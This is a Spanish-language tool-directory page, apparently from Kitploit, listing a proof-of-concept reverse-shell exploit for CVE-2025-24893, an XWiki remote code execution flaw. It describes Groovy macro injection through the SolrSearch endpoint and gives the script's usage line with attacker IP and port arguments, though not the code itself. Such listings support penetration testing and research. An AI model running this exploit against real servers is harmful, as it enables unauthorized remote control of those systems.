Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24893-Reverse-Shell — Payload de shell inversa para CVE-2025-24893 | Kitploit
Herramientas/GitHubGitHub/azureadtrent/cve-2025-24893-reverse-shell
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubazureadtrent/cve-2025-24893-reverse-shell

CVE-2025-24893-Reverse-Shell

Payload de shell inversa para CVE-2025-24893

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24893 - Exploit de ejecución remota de código en XWiki

PoC para CVE-2025-24893 – Ejecución remota de código mediante macro <groovy> de XWiki
Inspirado en el PoC original de Artemir


Descripción

Este es un exploit de prueba de concepto (PoC) para CVE-2025-24893, una vulnerabilidad de ejecución remota de código (RCE) en versiones vulnerables de XWiki.

La falla radica en la sanitización incorrecta de la entrada del usuario dentro del endpoint SolrSearch, que es vulnerable a la inyección de macros <groovy> sin sandbox a través de una consulta de feed RSS.

Este script inyecta un payload Groovy usando la macro async que resulta en ejecución de comandos en el servidor, permitiendo a un atacante desencadenar una reverse shell de vuelta a su sistema.


Uso

root@kitploit:~
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>
Descargar herramienta